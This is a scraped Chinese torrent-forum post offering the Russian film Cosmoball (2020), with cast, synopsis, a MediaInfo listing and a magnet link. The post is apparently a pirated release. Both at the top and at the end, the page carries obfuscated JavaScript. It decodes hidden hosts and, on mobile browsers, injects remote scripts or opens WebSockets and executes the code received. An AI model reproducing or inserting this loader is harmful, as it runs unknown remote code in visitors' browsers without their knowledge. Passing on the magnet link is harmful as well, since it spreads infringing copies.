银河守门员[中文字幕].Cosmoball.2020.1080p.BluRay.x265.10bit.DTS.2Audio 9.51GB

版主小s 29天前 244

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 银河守门员 / 宇宙特攻队(台) / 宇宙世界杯 / Goalkeeper of the Galaxy / Cosmoball / Vratar galaktiki

◎片 名 Вратарь Галактики

◎年 代 2020

◎产 地 俄罗斯

◎类 别 动作 / 科幻 / 运动

◎语 言 俄语

◎上映日期 2020-08-27(俄罗斯)

◎IMDb链接 https://www.imdb.com/title/tt7176054/

◎豆瓣评分 6.0/10 (1370人评价)

◎豆瓣链接 https://movie.douban.com/subject/30306050/

◎导 演 贾尼克·法伊济耶夫 Dzhanik Faiziyev (id:1024314)

◎编 剧 贾尼克·法伊济耶夫 Dzhanik Faiziyev (id:1024314)

安德烈·鲁巴诺夫 Andrey Rubanov (id:1384235)

◎演 员 维多利亚·阿加拉科娃 Viktoriya Agalakova (id:1396705)

沃尔夫冈·塞尔尼 Wolfgang Cerny (id:1411050)

瓦莱丽娅·德米特里耶娃 Valerya Dmitrieva (id:1367637)

米克哈尔·弗里蒙弗 Mikhail Efremov (id:1162992)

斯维特兰娜·伊万诺娃 Svetlana Ivanova (id:1311021)

玛尔塔·蒂莫菲娃 Marta Timofeeva (id:1394745)

尤里·库琴科 Yuriy Kutsenko (id:1319220)

叶甫盖尼·米罗诺夫 Yevgeny Mironov (id:1037377)

迪米特里·纳佐罗夫 Dmitriy Nazarov (id:1127094)

Konstantin Samoukov Konstantin Samoukov (id:1419373)

伊莲娜·雅科夫列娃 Elena Yakovleva (id:1165067)

mariya lisovaya mariya lisovaya (id:1451846)

叶夫根尼·罗曼佐夫 Evgeniy Romantsov (id:1456267)

◎标 签 科幻 / 奇幻 / 俄罗斯 / 科幻电影 / 2020 / 俄罗斯电影 / 电影 / 动画

◎简 介

2071。银河战争摧毁了月球,改变了地球的气候。莫斯科是热带森林,纽约是一片冰。在莫斯科上空升起一艘巨大的外星飞船-这是一个体育场,在那里进行了星际太空游戏的表演,联合体育和角斗士的战斗。整个银河系都在看比赛。只有运动员才能玩太空。这就是人们所说的那些具有非凡能力并能够管理这些能力的人。宇宙崇拜的一切,除了安东,最普通的人,谁只是梦想找到一份工作来帮助家庭。但有一天,他发现自己的超能力,并接受加入国家队。现在他是一个宇宙飞船的球员。安东还不知道这场比赛的命运决定了他的角色,最后的比赛将是一场为土地而战。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 57871596772535725795459124111010889764 (0x2B89AA03770FEBCA8F3DAF74AE4B0024)

  4. Complete name : [email protected]OM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 9.51 GiB

  8. Duration : 1 h 58 min

  9. Overall bit rate : 11.5 Mb/s

  10. Encoded date : UTC 2021-11-03 22:51:27

  11. Writing application : mkvmerge v53.0.0 ('Fool's Gold') 64-bit

  12. Writing library : libebml v1.4.1 + libmatroska v1.6.2


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 58 min

  20. Bit rate : 8 449 kb/s

  21. Width : 1 920 pixels

  22. Height : 804 pixels

  23. Display aspect ratio : 2.40:1

  24. Frame rate mode : Constant

  25. Frame rate : 24.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.228

  30. Stream size : 6.97 GiB (73%)

  31. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  32. Encoding settings : rc=crf / crf=15.5000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.80 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=5 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x804 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  33. Language : English

  34. Default : Yes

  35. Forced : No


  36. Audio #1

  37. ID : 2

  38. ID in the original source medium : 4352 (0x1100)

  39. Format : DTS

  40. Format/Info : Digital Theater Systems

  41. Codec ID : A_DTS

  42. Duration : 1 h 58 min

  43. Bit rate mode : Constant

  44. Bit rate : 1 509 kb/s

  45. Channel(s) : 6 channels

  46. Channel layout : C L R Ls Rs LFE

  47. Sampling rate : 48.0 kHz

  48. Frame rate : 93.750 FPS (512 SPF)

  49. Bit depth : 16 bits

  50. Compression mode : Lossy

  51. Stream size : 1.24 GiB (13%)

  52. Language : Russian

  53. Default : Yes

  54. Forced : No

  55. Original source medium : Blu-ray


  56. Audio #2

  57. ID : 3

  58. ID in the original source medium : 4354 (0x1102)

  59. Format : DTS

  60. Format/Info : Digital Theater Systems

  61. Codec ID : A_DTS

  62. Duration : 1 h 58 min

  63. Bit rate mode : Constant

  64. Bit rate : 1 509 kb/s

  65. Channel(s) : 6 channels

  66. Channel layout : C L R Ls Rs LFE

  67. Sampling rate : 48.0 kHz

  68. Frame rate : 93.750 FPS (512 SPF)

  69. Bit depth : 16 bits

  70. Compression mode : Lossy

  71. Stream size : 1.24 GiB (13%)

  72. Language : English

  73. Default : No

  74. Forced : No

  75. Original source medium : Blu-ray


  76. Text #1

  77. ID : 4

  78. ID in the original source medium : 4609 (0x1201)

  79. Format : PGS

  80. Muxing mode : zlib

  81. Codec ID : S_HDMV/PGS

  82. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  83. Duration : 1 h 53 min

  84. Bit rate : 33.4 kb/s

  85. Count of elements : 2534

  86. Stream size : 27.2 MiB (0%)

  87. Language : Chinese

  88. Default : Yes

  89. Forced : No

  90. Original source medium : Blu-ray


  91. Text #2

  92. ID : 5

  93. ID in the original source medium : 4610 (0x1202)

  94. Format : PGS

  95. Muxing mode : zlib

  96. Codec ID : S_HDMV/PGS

  97. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  98. Duration : 1 h 53 min

  99. Bit rate : 33.4 kb/s

  100. Count of elements : 2534

  101. Stream size : 27.3 MiB (0%)

  102. Language : Chinese

  103. Default : No

  104. Forced : No

  105. Original source medium : Blu-ray


  106. Text #3

  107. ID : 6

  108. ID in the original source medium : 4611 (0x1203)

  109. Format : PGS

  110. Muxing mode : zlib

  111. Codec ID : S_HDMV/PGS

  112. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  113. Duration : 1 h 53 min

  114. Bit rate : 17.9 kb/s

  115. Count of elements : 2534

  116. Stream size : 14.6 MiB (0%)

  117. Language : Chinese

  118. Default : No

  119. Forced : No

  120. Original source medium : Blu-ray


  121. Text #4

  122. ID : 7

  123. ID in the original source medium : 4612 (0x1204)

  124. Format : PGS

  125. Muxing mode : zlib

  126. Codec ID : S_HDMV/PGS

  127. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  128. Duration : 1 h 53 min

  129. Bit rate : 18.0 kb/s

  130. Count of elements : 2534

  131. Stream size : 14.7 MiB (0%)

  132. Language : Chinese

  133. Default : No

  134. Forced : No

  135. Original source medium : Blu-ray


  136. Text #5

  137. ID : 8

  138. ID in the original source medium : 4608 (0x1200)

  139. Format : PGS

  140. Muxing mode : zlib

  141. Codec ID : S_HDMV/PGS

  142. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  143. Duration : 1 h 53 min

  144. Bit rate : 24.5 kb/s

  145. Count of elements : 1934

  146. Stream size : 19.9 MiB (0%)

  147. Language : English

  148. Default : No

  149. Forced : No

  150. Original source medium : Blu-ray


  151. Menu

  152. 00:00:00.000 : en:第 01 章

  153. 00:06:58.041 : en:第 02 章

  154. 00:16:46.333 : en:第 03 章

  155. 00:26:32.041 : en:第 04 章

  156. 00:34:22.916 : en:第 05 章

  157. 00:45:02.708 : en:第 06 章

  158. 00:57:28.333 : en:第 07 章

  159. 01:06:33.000 : en:第 08 章

  160. 01:16:36.500 : en:第 09 章

  161. 01:26:30.958 : en:第 10 章

  162. 01:34:43.208 : en:第 11 章

  163. 01:44:02.750 : en:第 12 章

  164. 01:54:29.541 : en:第 13 章




复制代码


TAGS 动作 科幻 运动

磁力链:
  • magnet:?xt=urn:btih:D60E163B390AB970A658B87BEA165EA64FCE2688

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};